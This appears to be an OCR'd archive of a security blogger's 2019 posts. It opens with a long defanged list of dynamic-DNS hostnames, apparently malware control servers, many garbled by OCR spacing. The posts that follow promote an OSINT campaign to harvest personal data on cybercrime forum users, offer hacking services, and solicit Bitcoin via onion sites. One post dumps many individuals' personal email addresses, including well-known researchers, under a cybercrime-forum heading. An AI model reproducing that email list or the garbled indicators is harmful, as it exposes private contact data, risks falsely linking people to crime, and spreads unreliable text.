hxxp://parrot01.hopto.org/ 
hxxp://pars.ddns.net/ 
hxxp://persir. no-ip. biz/ 
hxxp://phantom94.ddns.net/ 
hxxp://photofix. hopto.org/ 
hxxp ://pianoti Ies2.ddns.net/ 
hxxp://pi mpdaddy.myq-see.com/ 
hxxp://pippo86. no-ip. biz/ 
hxxp ://portmei rn.ddns.net/ 
hxxp ://ppl web. pplmotorhomes.com/ 



hxxp://premi um007.zapto.org/ 
hxxp://priyaku mari.ddns.net/ 
hxxp://profmi lf.zapto.org/ 
hxxp://prohacker.freedy namicdns.org/ 
hxxp://projectp.ddns.net/ 
hxxp://pruebasernesto.ddns.net/ 
hxxp://q wertyl212.ddns.net/ 
hxxp://rOOt.myftp.biz/ 
hxxp://r3cxw.ddns.net/ 
hxxp://r90. no-ip. biz/ 
hxxp://radouan 123.hopto.org/ 
hxxp://rah imtrx.hopto.org/ 
hxxp://ral iphesus.ddns.net/ 
hxxp://rameezmaster.ddns.net/ 
hxxp://rand snaira.dnsdynamic.com/ 
hxxp://rarwindow. no-ip. biz/ 
hxxp://ratfora ndroid.ddns.net/ 
hxxp://rdsl 1.ddns.net/ 
hxxp://redcode.ddns.net/ 
hxxp://reddemon.ddns.net/ 



hxxp://refsa. duckdns.org/ 
hxxp://reich666. ddns.net/ 
hxxp://reich 777.ddns.net/ 
hxxp://remotei p999.ddns.net/ 
hxxp://ri nalditeam.ddns.net/ 
hxxp://rmkl 33. hopto.org/ 
hxxp://rmx2121.ddns.net/ 
hxxp://rockrock.ddns.net/ 
hxxp://rokl3198666. no-ip.biz/ 
hxxp://ron 137 2.ddns.net/ 
hxxp://royalhacker.zapto.org/ 
hxxp://rpshowpick.ddns.net/ 
hxxp://rpswlrkgkarp.p-e.kr/ 
hxxp://rzra51126.ddns.net/ 
hxxp://s.leas.im/ 
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hxxp://s3b4s.noip.me/ 
hxxp://sabbah.duckdns.org/ 
hxxp://sadaq.ddns.net/ 
hxxp://sai ber-far68.ddns.net/ 



hxxp://saighi nissou.ddns.net/ 
hxxp://saj ad ianh.ddns.net/ 
hxxp://sajjadnassar3. no-ip. biz/ 
hxxp://salah067. hopto.org/ 
hxxp://sal arkalat.ddns.net/ 
hxxp://salemaziz. hopto.org/ 
hxxp://samira. no-ip. biz/ 
hxxp://samoomalik. no-ip. biz/ 
hxxp://samuseucu.ddns.net/ 
hxxp ://santamari agorettimestre.it/ 
hxxp://saral9918.ddns.net/ 
hxxp ://sarahwygan. no-ip. biz/ 
hxxp://saraia.ddns.net/ 
hxxp://sarasisi. no-ip.org/ 
hxxp://sasi 546454. hopto.org/ 
hxxp ://saza n765.ddns.net/ 
hxxp ://secu reline2244.ddns.net/ 
hxxp://secu repurpose, no-ip. info/ 
hxxp ://secu ritytests.ddns.net/ 
hxxp ://secu ritytestt.ddns.net/ 



hxxp://sedalbi.com/ 
hxxp://server4u pdate.serveftp.com/ 
hxxp://servi dor23.ddns.net/ 
hxxp://servr. hopto.org/ 
hxxp://sesizkal 32. no-ip. biz/ 
hxxp://seven 1.ddns.net/ 
hxxp://seyf2017.1 in kpc.net/ 
hxxp://shahabhacker.ddns.net/ 
hxxp://shahidsajan. no-ip.biz/ 
hxxp://shara wy74.hopto.org/ 
hxxp://sharmayash. no-ip. biz/ 
hxxp://sherlockhol mes.duckdns.org/ 
hxxp://shgt.tk/ 
hxxp://shoo2018. no-ip.org/ 
hxxp://shosh.ddns.net/ 
hxxp://showj.f3322.net/ 
hxxp://ski nchanger.hopto.org/ 
hxxp://skylexl23.hopto.org/ 
hxxp://sl avikkalinovskiy.ddns.net/ 
hxxp://slayslay.duckdns.org/ 



hxxp://smi ix2012.ddns.net/ 
hxxp://smk22.j kt.net/ 
hxxp://snaider. hopto.org/ 
hxxp://sn iperviruse3.hopto.org/ 
hxxp://sn iperyakub.ddns.net/ 
hxxp://social plus.ddns.net/ 
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hxxp://somenormal guy.duckdns.org/ 
hxxp://sond resl.ddns.net/ 
hxxp://son kar412.duckdns.org/ 
hxxp://sorry.duckdns.org/ 
hxxp://soso.noip.us/ 
hxxp://specre.com/ 
hxxp://spicymemes.d uckdns.org/ 
hxxp://spiel007.ddns.org/ 
hxxp://spofy.ddns.net/ 
hxxp://spynote-web.dynu.com/ 
hxxp://sramic.ddns.net/ 
hxxp://ssjf.myftp.biz/ 
hxxp://stand by 1537.duckdns.org/ 



hxxp://stori ng.hopto.org/ 
hxxp://strateg.ddns.net/ 
hxxp://su perlegitratvirus.ddns.net/ 
hxxp://svn-01.ddns.net/ 
hxxp ://sweetman2020. no-ip. biz/ 
hxxp://system32.com/ 
hxxp://taha 100iq.hopto.org/ 
hxxp ://taherhacker. hopto.org/ 
hxxp ://tak. no-ip. info/ 
hxxp://takpar67.no-ip. biz/ 
hxxp ://tarasl92 8.ddns.net/ 
hxxp://targi01. hopto.org/ 
hxxp://tatacall. servebeer.com/ 
hxxp://tatal ine.hopto.org/ 
hxxp://tedy 1993. ddns.net/ 
hxxp://test.pagez.kr/ 
hxxp ://testl45.ddns.net/ 
hxxp ://test29.ddns.net/ 
hxxp ://testan.ddns.net/ 
hxxp ://testand ro.ddns.net/ 



h xx p://testa pkk. hopto.org/ 
hxxp://testkps.ddns.net/ 
hxxp://testsr.ddns.net/ 
hxxp://testsss. ddns.net/ 
hxxp://testxy.ddns.net/ 
hxxp://theblackl 6.ddns.net/ 
hxxp://thed roidjack.ddns.net/ 
hxxp://thegangsterrap.noip.me/ 
hxxp://theg od2.ddns.net/ 
hxxp://theki I lers.ddns.net/ 
hxxp://themay hen23.no-ip.org/ 
hxxp://tnaxin. msns.cn/ 
hxxp://tomyyk.ddns.net/ 
hxxp://tonyjony.ddns.net/ 
hxxp://topmax. myq-see.com/ 
hxxp://toyman6699. no-ip. info/ 
hxxp://trythel ast.no-ip.org/ 
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hxxp://tu nisvista.3utilities.com/ 
hxxp://u down, ddns.net/ 



hxxp://ufolog lyly.ddns.net/ 
hxxp://u marl4344.ddns.net/ 
hxxp://un known user, no-ip. biz/ 
hxxp://u pdater.myftp.org/ 
hxxp://u pdatesystem.dynu.com/ 
hxxp://u pdatexxx.hopto.org/ 
hxxp://usa.myftp.biz/ 
hxxp://u sa2222.ddns.net/ 
h xx p: //use rframer.sytes.net/ 
hxxp://u serna meg oprol.ddns.net/ 
hxxp://u smh.myq-see.com/ 
hxxp://uzzal 619.viewdns.net/ 
hxxp://vajausi ng.dynu.com/ 
hxxp://vego.ddns.net/ 
hxxp://vetal amatorl.ddns.net/ 
hxxp://viag ra.jumpingcrab.com/ 
hxxp://victi rn.no-ip.org/ 
hxxp://vigo. hopto.org/ 
hxxp://vikas. no-ip. biz/ 
hxxp://vi I levalo.chickenkiller.com/ 



hxxp://vi pcoon.com/ 
hxxp://vipmustafa. no-ip. info/ 
hxxp://vpnO.ddns.net/ 
hxxp://vwelxv.ddns.net/ 
hxxp://w0rm3 2. ddns.net/ 
hxxp://warl 10ck.ddns.net/ 
hxxp://warri rrs.no-ip.org/ 
hxxp://wasawa I id. hopto.org/ 
hxxp://wassamlOO.ddns.net/ 
hxxp://wasxmrtd ub.ddns.net/ 
hxxp://wcvwcv. picp.net/ 
hxxp://webhack2017.ddns.net/ 
hxxp://webi7.ddns.info/ 
hxxp://weedforl ifehacker.ddns.net/ 
hxxp://welcomeheretomept.ddns.net/ 
hxxp://williettinger.cc/ 
hxxp://wi n32.ddns.net/ 
Historical OSINT - Dancho Danchev's Media and News Coverage - 2008-2013 (2019-09-20 17:25)

Dear blog readers, I wanted to take the time and effort to summarize all the currently related news media articles referencing me and my research throughout the period 2008-2013. I also wanted to express my gratitude to everyone who approached me seeking my assistance in an upcoming news article, including those who participated in the search for me circa 2010. Users interested in approaching me regarding potential news stories, including conference presentations and possible threat intel requests, can approach me at disruptive.individuals@gmail.com

Stay tuned!

Research and News Articles covering my research and referencing me throughout - 2008:

• [1]Russian hacker 'militia' mobilizes to attack Georgia

• [2]Fraudsters Target Facebook With Phishing Scam

• [3]Fake Microsoft e-mail contains Trojan virus

• [4]Hackers expand massive IFRAME attack to prime sites

• [5]Hackers infiltrate Google searches

• [6]Hackers expand massive IFrame attack to prime sites

• [7]Hackers knocked Comcast.net offline

• [8]Adobe investigates Flash Player attacks

• [9]High-tech bank robbers phone it in

• [10]Attackers booby-trap searches at top Web sites

• [11]Carpet bombing networks in cyberspace

• [12]Storm worm e-mail says U.S. attacked Iran

• [13]India's underground CAPTCHA-breaking economy

• [14]Domain Name Record Altered to Hack Comcast.net

• [15]Google searchers could end up with a new type of bug

• [16]Ongoing IFrame attack proving difficult to kill

• [17]Hackers expand massive IFRAME attack to prime sites

• [18]Danchev: The small pack Web malware exploitation kit

• [19]Danchev: Massive SQL injection the Chinese way

• [20]CAPTCHAs are dead - new research from Dancho Danchev confirms it

• [21]Hackers infiltrate Google searches

• [22]Massive faux-CNN spam blitz uses legit sites to deliver fake Flash

• [23]Faked CNN spam blitz pushes fake Flash

• [24]Danchev: Anti-fraud site DDOS attack

• [25]Sony PlayStation site victim of SQL-injection attack

• [26]Fake CNN Alert Still Spreading Malware

• [27]Look Ma, I'm on CIA.gov

Research and News Articles covering my research 
and referencing me throughout - 2009: 

• [28]Green Dam exploit in the wild

• [29]"In gaz we trust": a fake Russian energy company facilitating cybercrime

• [30]Don't pay your ransom via SMS

• [31]NYT scareware scam linked to click fraud botnet

• [32]Danchev: A crimeware developer's to-do list

• [33]Danchev rained on my scareware campaign

• [34]Is "aggregate-and-forget" the future of cyber-extortion?

• [35]NYT scareware scam linked to click fraud botnet

• [36]Microsoft declares war on 'scareware'

• [37]Don't pay your ransom via SMS

• [38]Twitter warms up malware filter

• [39]What's really the safest Web Browser?

• [40]With Unrest in Iran, Cyber-attacks Begin

• [41]Zeus bot found using Amazon's EC2 as C&C server

Research and News Articles covering my research 
and referencing me throughout - 2010: 

• [42]Firefox add-on encrypts sessions with Facebook, Twitter 

• [43]Watch out for malware with those pretty Mac 
screensavers 

• [44]Months-old Skype vulnerability exploited in the wild 

• [45]Danchev: Money mule recruiters 

• [46]Cybercrime's bulletproof hosting exposed 

• [47]Malware Threatens to Sue BitTorrent Downloaders 

• [48]Firefox add-on encrypts sessions with Facebook, Twitter

• [49]Chuck Norris Botnet Karate-chops Routers Hard

Research and News Articles covering my research 
and referencing me throughout - 2011: 

• [50]Kaspersky disputes McAfee's Shady Rat report 

• [51]Has EV-SSL Growth Been Slow? 

• [52]Report: Vishing Attack Targets Skype Users 

Research and News Articles covering my research 
and referencing me throughout - 2012: 

• [53]Fake UPS notices deliver malware 

• [54]ZeuS/Zbot Trojan Spread Through Rogue US Airways 
Email 

• [55]New Skype malware threat reported: Poison Ivy 

• [56]Five Koobface botnet suspects named by New York 
Times 

• [57]Virtual jihad: How real is the threat? 

• [58]Is the death knell sounding for traditional antivirus?

• [59]Can the Nuclear exploit kit dethrone Blackhole?

• [60]Experts split over regulation for bounty-hunting bug sniffers

• [61]Spammers Using Fake YouTube Notifications to Peddle Drugs

• [62]Adele Bests Adderall As Affiliate Spammers Offer Music Downloads

• [63]Bulgarian sleuth unveils botnet operators 

• [64]Fake PayPal Emails Distributing Malware 

• [65]Web Gang Operating in the Open 

• [66]ZeuS/Zbot Trojan Spread Through Rogue US Airways 
Email 

• [67]Buy 500 hacked Twitter accounts for less than a pint 

• [68]NBC.com Hacked, Infected With Citadel Trojan 

Research and News Articles covering my research 
and referencing me throughout - 2013: 

• [69]How Much Does A Botnet Cost? 

• [70]Automated YouTube account generator offered to cyber 
crooks 

• [71]Upgraded Modular Malware Platform Released in Black 
Market 

• [72]Deconstructing the Al-Qassam Cyber Fighters Assault 
on US Banks 

• [73]NBC hack infects visitors in 'drive by' cyberattack 

• [74]Bitcoins are being traded for hack tools 

• [75]New DIY Google Dorks Based Hacking Tool Released 

• [76]Hacking The TDoS Attack

• [77]Mass website hacking tool alerts to dangers of Google dorks

• [78]Cybercrime service automates creation of fake scanned 
IDs 

• [79]Spammers unleash DIY phone number slurping web 
tool 

• [80]Spam email contains malware, not Apple gift card 

• [81]APT1, that scary cyber-Cold War gang: Not even 
China's best 

• [82]Mass website hacking tool alerts to dangers of Google 
dorks 

• [83]C&C PHP script for staging DDoS attacks sold on underground forums

• [84]Russian Malware-as-a-Service Offers Up Server Rentals 
for $240 a Pop 

• [85]Java exploit kit sells for $40 per day 

• [86]Buggy DIY botnet tool leaks in black market 

• [87]New DIY Google Dorks Based Hacking Tool Released 

• [88]Botnets for rent, criminal services sold in the underground market

• [89]Spam email contains malware, not Apple gift card
Announcing Law Enforcement and OSINT Intelligence Operation "Uncle George" - Join Me Today! (2019-10-16 20:16)

Dear blog readers,

Surprise, surprise! I wanted to let everyone know that I've spent a decent portion of my time crawling and actually harvesting and data mining 78 high-profile public Cybercrime Forum Communities, basically consisting of 1M raw OSINT data Web site pages harvested and ready for processing and enrichment. Dare to join the campaign? Keep reading and drop me a line at ddanchev@cryptogroup.net to coordinate and discuss, including details on how to obtain free access to the 2019 Cybercrime Forum Community Data Set, which is basically 18GB comprising 1M crawled and harvested Web sites from the most popular Public Cybercrime Forum Communities.

Timeline of the Project including What You Need to Participate with the Ultimate Goal to Track Down the Individuals Behind These Communities and Actually Take Them Down:

• Drop me a line at ddanchev@cryptogroup.net and let me know that you've downloaded it and that you're currently interested in participating in the project

• Please coordinate with me what you plan to do with the archive in terms of possible raw OSINT enrichment and automated Social Network Analysis, including sharing it with your Law Enforcement contacts or colleagues in your organization, at dancho.danchev@hush.com

• Grab a copy of Open Desktop Semantic Search - https://www.opensemanticsearch.org and process the archive

• Grab a copy of Solr-Powered Local Yacy Search Engine - https://yacy.net and process the archive

• Grab a copy of Carrot2 - Open Source Search Results Clustering Engine - https://project.carrot2.org/ and connect it with Solr-Powered Local Yacy Search Engine and start processing the results and share the results with me at dancho.danchev@hush.com

• Grab a copy of the following Statistical graphs generating tool - https://github.com/ko-ichi-h/khcoder and begin working on the archive

The Objectives List:

• Gather as much evidence as possible for participation in fraudulent activity and shut down the community

• Collect as much personal information as possible including IoCs (Indicators of Compromise), Web site URLs, including personal IM accounts and personal email addresses

• Publicly publish the results of the crowd-sourced raw OSINT enrichment project campaign and ask everyone to reach out to their contacts in the U.S. Intelligence Community and international Law Enforcement to share the data and actively participate in the actual prosecution of the individuals behind these Cybercrime Forum Communities and the actual take-down process

• Share the data-set with as many academic, Security Industry, U.S. Intelligence and international Law Enforcement contacts as possible

Drop me a line at ddanchev@cryptogroup.net and let's get the campaign going!

The results? Check out the following enriched raw OSINT graph which I managed to create for research purposes and to motivate you to participate.
[Figure: enriched raw OSINT graph. Axes: Dimension 1 (0.2364, 20.96%), Dimension 2 (0.171, 15.16%)]

tdog@myself.com 

ralph@doncaster.on.ca 

realplastic@gmx.net 



you@hush.com 

you@elitefitness.com 

DR.Smith@belizeweb.com 

Iighthawk4@ziplip.com 

ampersona@ziplip.com 
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lancelotlink@ziplip.com 

mhall@netcom.com 

pvthc@ziplip.com 

chbigben@ziplip.com 

drift@ziplip.com 

mac _addictl984@yahoo.com 

littletommy@ziplip.com 

FireWire@ziplip.com 

firewire7@hotmail.com 

renegadellK@ziplip.com 

zidaneiv@hotmail.com 

wldnczy@ziplip.com 

fakelDusa@ziplip.com 

thelandonly@ziplip.com 



GiB _Uk@ziplip.com 

jonl01@ziplip.com 

helpwanted@ziplip.com 

email.Ill _barcode _lll@ziplip.com 

Tz2@ziplip.com 

madrid@ziplip.com 

Artyanon@mailvault.com 

utax@inbox.lv 

saradonne@ziplip.com 

perfectids@yahoo.com 

blackarmor@eurosport.com 

kkimmel@terroristsupply.com 

idline@mailvault.com 

dr@dursec.com 

rongula31@hotmail.com 

ken.williams@ey.com 

roesch@sourcefi re.com 

fygrave@scorpions.net 

vision@whitehats.com 

rfp@wiretrip.net 



alephl@securityfocus.com 

wooc@powersurfr.com 

apr.inc@powersurfr.com 

conroy.badger@powersurfr.com 

crystal@positioning-research.com 

jason.dorie@blackboxgames.com 

darryl _turner@yahoo.com 

mrandles@softhome.net 

vizuelle@eudoramail.com 

fyodor@insecure.org 

spikeman@spikeman.net 

lance@spitzner.net 

listuser@seifried.org 

mfranz@cisco.com 

phillip.ibis@blackboxgames.com 

cwallace@exceedia.com 
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priest@sfu.ca 

hdm@digitaloffense.net 

rhamel@kpmg.ca 



nico@securite.org 

kaneda@securite.org 

dsward9s@pacbell.net 

andy@dragonfly.demon.co.uk 

ktwo@ktwo.ca 

kinksterl@shaw.ca 

ajarman@metacomcorp.com 

zindelak@telusplanet.net 

jeff@wwti.com 

smkoen@hotmail.com 

cwilson2@kpmg.ca 

newspixie@hotmail.com 

mock@obscurity.org 

j@lords.com 

ksoze@obscurity.org 

f ra n k@ a tsta ke. c o m 

fishy@powersurfr.com 

cakeislove@hotmail.com 

tiffany _kary@zd.com 

stephenn@powersurfr.com 



webmaster@pneumafables.com 

bsapiro@kpmg.ca 

kmx@egatobas.org 

hectorh@pobox.com 

emmanuel@relaygroup.com 

vanja@vanja.com 

dje@bht.com 

dugsong@monkey.org 

lyndon@orthanc.ab.ca 

mts@off.off.to 

paudley@blackcat.ca 

robert_david _graham@yahoo.com 

spambait-kyx@inetgrity.com 

chris@obscurity.org 

peter _wong@pmc-sierra.com 

janet@lomas.ab.ca 

dfreelove@yottayotta.com 

dowen@intravelnet.com 

randlest@oanet.com 

jay@bastille-linux.org 



phil@ccc-ltd.com 

jed@pickel.net 

gshipley@neohapsis.com 

deraison@cvs.nessus.org 

maxx@securite.org 

mixter@newyorkoffice.com 

deraadt@cvs.openbsd.org 
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dittrich@cac.washington.edu 

bgreenbaum@securityfocus.com 

neil@bortnak.com 

annemarie@counterpane.com 

chris.kuethe@ualberta.ca 

bob.beck@ualberta.ca 

tan@atstake.com 

natasha@snort.org 

arr@watson.org 

aempirei@ucla.edu 

ggolomb@enterasys.com 

jfrank@b-ap.com 



robert@infoserf.net 

kkuehl@cisco.com 

donna.andert@sun.com 

bmc@snort.org 

jgary@clicktosecure.com 

jpavlick@sourcefire.com 

talisker@networkintrusion.co.uk 

jwalchuc@enterasys.com 

itay@imc.nl 

halvar@blackhat.com 

ppY@ldealRealms.com 

forrest@code-lab.com 

mconley@atstake.com 

jennifer@granick.com 

scott@microsoft.com 

ah@securityfocus.com 

cruci@hwa-security.net 

solar@openwall.com 

ivan.arce@corest.com 

rlogan@camisade.com 



cmg@uab.edu 

jed@grep.net 

vOnelmO@best.com 

snorthcutt@hawaiian.net 

frank@ccc.de 

dmckay@microsoft.com 

jwilkins@bitland.net 

kf@gnosys.biz 

unlearn@ne.mediaone.net 

jpr5@darkridge.com 

shok@dataforce.net 

thegnome@nmrc.org 

ofir@sys-security.com 

provos@umich.edu 

silvio@big.net.au 

mike@infonexus.com 

crispin@wirex.com 

halfdead@phear.org 
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niness@devilness.org 



curtis.king@messagingdirect.com 

rob@incident-response.org 

kam@aversion.net 

fuk@ghettobox.eurocompton.net 

merharm@wra.net 

zmagic@phear.org 

inter@logos.relcom.ru 

alive@blazinfyre.net 

daemon@esmith.geezernet.nu 

nwonknu@dsl-65-187-119-141.telocity.com 

abramelon@cpn.cookchildrens.org 

thegnome@nrmc.org 

me@btinternet.com 

Administrator@hotmail.com 

redeemer@gOtrOOt.net 

bOiler@hotmail.com 

who@radiofreesatan.com 

poolemit@mailvault.com 

fuckyoutxtax@hell.com 

proxydialup@yahoo.com 



info@megastep.com 

sales@diplomaone.com 

abuse@teledisnet.be 

N0C@sprint.net 

dvlpmntsftwr@hotmail.com 

stepgas@hotmail.com 

rra33@hotmail.com 

cody@server.snni.com 

kwparris@csuh.alunlink.com 

wolfram@counterfeitcards.com 

whoever@hotmail.com 

Sample Public ICQ UIN Numbers of ShadowCrew 
Cybercrime Forum Community circa 2002-2004: 


Sample Public IM User Names of ShadowCrew 
Cybercrime Forum Community circa 2002-2004: 


Let's show them how it's done! Send a message at ddanchev@cryptogroup.net to coordinate and discuss! Stay tuned!

New Commercial Security Research OSINT Cybercrime Research and Threat Intelligence Gathering Services Portfolio Available On Demand! (2019-11-02 18:14)

Dear blog readers,

I wanted to let everyone know of a currently active commercial portfolio of services that I'm publicly offering for the purpose of reaching out to colleagues and friends, including companies, vendors and organizations who might be interested in working with me for the purpose of obtaining access to never-published before Security Research analysis, reports, briefs, podcasts and various other commercially obtainable virtual and cyber assets that you and your organization can take advantage of.

Approach me at - dancho.danchev@hush.com today to discuss!

Key Commercial Services that I'm currently offering include:

• [1]Security Services

• [2]OSINT Services

• [3]Hacking Services

• [4]Intelligence Services

• [5]Geopolitical Services

Including the following commercial services available on [6]Patreon Community:

• Real-Time Security Consultation 

• Security Newsletter 

• Cybercrime Blog Post 



• Security Podcast 

• Malware Analysis 

• Threat Intelligence Analysis 

• Security Workshop 

• OSINT Analysis 

• Geopolitical Analysis 

• Threat Actor Profiling 

• National Security Analysis 

• Cyber jihad Analysis 

• Dark Web Intelligence and OSINT Analysis 

• Security Presentation 

• Cyber Security Business Development 

• Red Team Penetration Testing Assessment 

• Blue Team Penetration Testing Assessment 

• Target of Opportunity Targeting 

• Cybercrime Forum Monitoring 

• Underground Chatter Monitoring 

• Network Deception Consultation 

• Military Scenario Building 
• Cyber Warfare Scenario Building

• OSINT Enrichment and Data Mining

• Cyber Warfare Program Estimation

• Weapons System Analysis

• Cyber SIGINT and Cyber Assets Discovery

Stay tuned!

1. https://unit-123.org/security-services

2. https://unit-123.org/osint-services

3. https://unit-123.org/hacking-services

4. https://unit-123.org/intelligence-services

5. https://unit-123.org/geopolitical-services

6. https://www.patreon.com/ddanchevl23 
New Cybertronics - VR for Hackers and Security Experts Dark Web Onion Address (2019-12-02 10:15)

Dear blog readers,

I wanted to let everyone know that I've recently changed the official Dark Web Onion address for my Cybertronics - VR for Hackers and Security Experts Project including the actual Bitcoin donation address.

GOt Bitcoin? Consider going through the project proposal today - http://lkzihepprlhxtvbutjedoazbsqd4avmifhpjms3zuq7itceiu4qajwad.onion/ including to make a possible Bitcoin donation using the following Bitcoin Address:

3J8Jt7XCBGtCL6XRLTWhKfRQBmhhqGs4aP

I wanted to say a big thanks to everyone who approached me in terms of the project including to actually make a donation. The official schedule release is scheduled for January, 2020 and I'll make sure to keep everyone posted on current and future project updates.

Stay tuned!
Official World Hacker Global Domination Group (WHGDG) Dark Web Onion Launch! (2019-12-02 10:16)

Dear blog readers,

I've been spending more time on the Dark Web these days including the active launching of a second Dark Web Onion and the official launch of the World Hacker Global Domination Group (WHGDG) which is basically a Call for Papers, Call for Participation and Call for Innovation request on behalf of me for the purpose of reaching out to the U.S Intelligence Community as an independent contractor for the purpose of presenting and eventually getting funding for a variety of commercial cyber security and hacking including Threat Intelligence and Offensive Cyber Warfare Projects including the active recruitment of new members.

Check out the Official Dark Web Onion: http://nexvibpe4xszfx4cp2jldkdyhnjnah5qnckoagoiry3vpyv5eheh55id.onion/ and don't forget to visit Cybertronics - Virtual Reality Social Network for Hackers and Cyber Security Experts Bitcoin-accepting Project - http://ca7brwpxmnbssdoh4dfoijyr7zwetob74x3berlvmeekhmkt7zcjdjqd.onion/ and donate today!

How you can participate?

• Visit the Dark Web Onion and go through the Call for Participation, Call for Papers and Call for Innovation and approach me at ddanchev@cryptogroup.net in case you believe that you can contribute with knowledge, data and expertise including the technical "know-how" to participate in any of the Key Points mentioned in the Dark Web Onion

Stay tuned for a major Web Site update by the end of the week including the production of an extremely popular Security Podcast, Security Vlog and an additional set of never-published before possibly classified and sensitive Technical Data and Cyber Security and Hacking resources.

Enjoy!
Dancho Danchev's Twitter Account - 2010 - Direct Download Link - Historical OSINT (2019-12-02 10:19)

Dear blog readers,

Takes you back doesn't it? I've decided to share with you a [1]direct download link of my old [2]Twitter account for you to download and go through and to say big thanks to everyone who's been keeping in touch with me throughout 2008-2013 including actual research work and related research inquiries.

Consider going through the archive and catching up with some of my research circa 2010-2014 and approach me - ddanchev@cryptogroup.net with your feedback or just to say hi in case you remember some of the research which I used to publish back then.

Stay tuned!

1. https://unit-123.or g/wp- 

content/uploads/2019/ll/Dancho Danchev Tweets 2010- 

1. zi p 

2. https://twitter.com/danchodanchev 
Join me on Medium! (2019-12-02 10:59)

Dear blog readers,

I wanted to let everyone know that I've recently joined [1]Medium and that I intend to post a variety of editorial type of articles on a daily basis including the fact that I was recently featured as a Top Writer in [2]Privacy.

Missing the editorial? Consider going through my old [3]ZDNet Zero Day Blog content archive including the following recently published editorial type of articles on Medium:

• [4]Assessing U.S Military Cyber Operational Capabilities to Counter Pro-ISIS Internet Infrastructure

• [5]My Involvement in the Top Secret GCHQ "Lovely Horse" Program and the Existence of the Karma Police

• [6]Kaspersky's Antivirus Products the NSA and U.S National Security — An Analysis

• [7]Assessment of U.S Intelligence Community Cyber Surveillance Programs and Tradecraft — Part One

• [8]How the NSA utilized Iranian Cyber Proxies To Participate in the BOUNDLESS INFORMANT Program?

• [9]Exposing GCHQ's Top Secret "GORDIAN KNOT" Cyber Defense Sensor Program — An Analysis

• [10]Exposing GCHQ's URL-Shortening Service and Its Involvement in Iran's 2009 Election Protests

Stay tuned!

1. https://medium.com/@danchodanchev

2. https://medium.com/tag/privacy

3. https://www.zdnet.com/meet-the-team/us/dancho-danchev/

4. https://medium.com/@danchodanchev/assessing-u-s-military-cyber-operational-capabilities-to-counter-pro-isis-internet-infrastructure-e4914bd8fb8c

5. https://medium.com/@danchodanchev/my-involvement-in-the-top-secret-gchq-lovely-horse-program-and-the-existence-of-the-karma-police-daaf08b028a2

6. https://medium.com/@danchodanchev/my-involvement-in-the-top-secret-gchq-lovely-horse-program-and-the-existence-of-the-karma-police-daaf08b028a2

7. https://medium.com/@danchodanchev/assessment-of-u-s-intelligence-community-cyber-surveillance-programs-and-tradecraft-part-one-24c29418107b

8. https://medium.com/@danchodanchev/how-the-nsa-utilized-iranian-cyber-proxies-to-participate-in-the-boundless-informant-program-e82045d44848

9. https://medium.com/@danchodanchev/exposing-gchqs-top-secret-gordian-knot-cyber-defense-sensor-program-an-analysis-db64aa8a62ea

10. https://medium.com/@danchodanchev/exposing-gchqs-url-shortening-service-and-its-involvement-in-iran-s-2009-election-protests-6c6a9282630
gOt Bitcoin? - Part Two (2019-12-04 18:15)

Dear blog readers,

I wanted to let you know that I've recently changed to a permanent [1]Dark Web Onion address - for my [2]Cybertronics - Virtual Reality Social Network for Hackers and Security Experts where I'm currently soliciting Bitcoin donations for the purpose of launching the project in January, 2020.

Got Bitcoin? Consider visiting the Dark Web Onion and making a donation today and stay tuned for the upcoming updates and actual launch of the project in January, 2020 - http://lkzihepprlhxtvbutjedoazbsqd4avmifhpjms3zuq7itceiu4qajwad.onion/

Stay tuned!

1. https://ddanchev.blogspot.com/2019/08/g0t-bitcoin.html

2. https://ddanchev.blogspot.com/2019/12/new-cybertronics-vr-for-hackers-and.html
Announcing New Hacking Security and Hacktivism-Themed Online Forum Community! Join me Today! (2019-12-12 19:00)

IFRAME: [1]https://www.youtube.com/embed/naiklltDKlw?feature=player_embedded

Dear blog readers,

I've recently launched an extremely popular and comprehensive Hacking and Security possibly Hacktivism-Themed Online Forum Community called "[2]Security is Futile" using the extremely popular [3]PlushForums Platform consisting of over 193 Hacking and Security Topic Categories.

The initial idea behind launching the community is to spread data, information and knowledge and to provoke discussion into various hot Hacking and Security topics including to solicit high-profile VIP Hacker and Security Experts to actually join the community and contribute with content.

Official "Security is Futile!" Hacking and Security Forum Community URL: https://forums.offensive-warfare.com

Stay tuned!

1. https://www.youtube.com/embed/naiklltDKlw?feature=player_embedded

2. https://forums.offensive-warfare.com/

3. https://plushforums.com/
Announcing Law Enforcement and OSINT Intelligence Operation "Uncle George" - Join Me Today! - Part Two (2019-12-12 19:12)

Dear blog readers,

I wanted to let you know that I've been spending more time doing active Security Industry outreach in terms of the [1]2019 Cybercrime Forum Data Set and that I've already started working with several vendors in terms of possible OSINT enrichment and actual processing of the data.

Perfect timing to say thanks to Ilya Timchenko and McAfee for actually reaching out and managing to process the following artifacts from the actual Data Set which I've decided to publicly share with everyone who reaches out and expresses interest in working with me on the Data Set with the idea to possibly assist the Security Community and Law Enforcement in terms of tracking down the individuals behind these campaigns and actually shutting them down.

Possible Personally Identifiable Artifacts Found in the Actual Data Set Include:

• [2]Cybercriminal Cryptocurrency Addresses

• [3]Cybercriminal Emails

• [4]Cybercriminal ICQ Numbers

• [5]Cybercriminal Phone Numbers

• [6]Cybercriminal QQ IDs

• [7]Cybercriminal Telegram IDs/[8]Telegram IDs

• [9]Cybercriminal Dark Web Onion Addresses

• [10]Cybercriminal Viber Accounts

• [11]Cybercriminal VK Accounts

• [12]Cybercriminal XMPP Accounts

Including the following massive update courtesy of me including all the publicly obtainable [13]Email Addresses obtained from the 2019 Cybercrime Forum Data Set including all the publicly obtainable [14]IP Addresses obtained from the 2019 Cybercrime Forum Data Set which appear to be mostly Socks4/Socks5 and publicly accessible compromised hosts used for "island-hopping" tactics.

I'll be posting an updated set of analysis and data regarding the currently ongoing [15]Law Enforcement and OSINT Intelligence Operation "Uncle George" anytime soon.

Approach me at ddanchev@cryptogroup.net in case you're interested in working with me on this project or want to obtain access to the actual Data Set for possible OSINT enrichment and research purposes.

Stay tuned!

1. https://ddanchev.blogspot.com/2019/10/announcing-law-enforcement-and-osint.html

2. https://unit-123.org/wp-content/uploads/2019/12/cryptocurrency.txt

3. https://unit-123.org/wp-content/uploads/2019/12/emails.txt

4. https://unit-123.org/wp-content/uploads/2019/12/emails.txt

5. https://unit-123.org/wp-content/uploads/2019/12/phone.txt

6. https://unit-123.org/wp-content/uploads/2019/12/qq.txt

7. https://unit-123.org/wp-content/uploads/2019/12/telegram1.txt

8. https://unit-123.org/wp-content/uploads/2019/12/telegram2.txt

9. https://unit-123.org/wp-content/uploads/2019/12/tor.txt

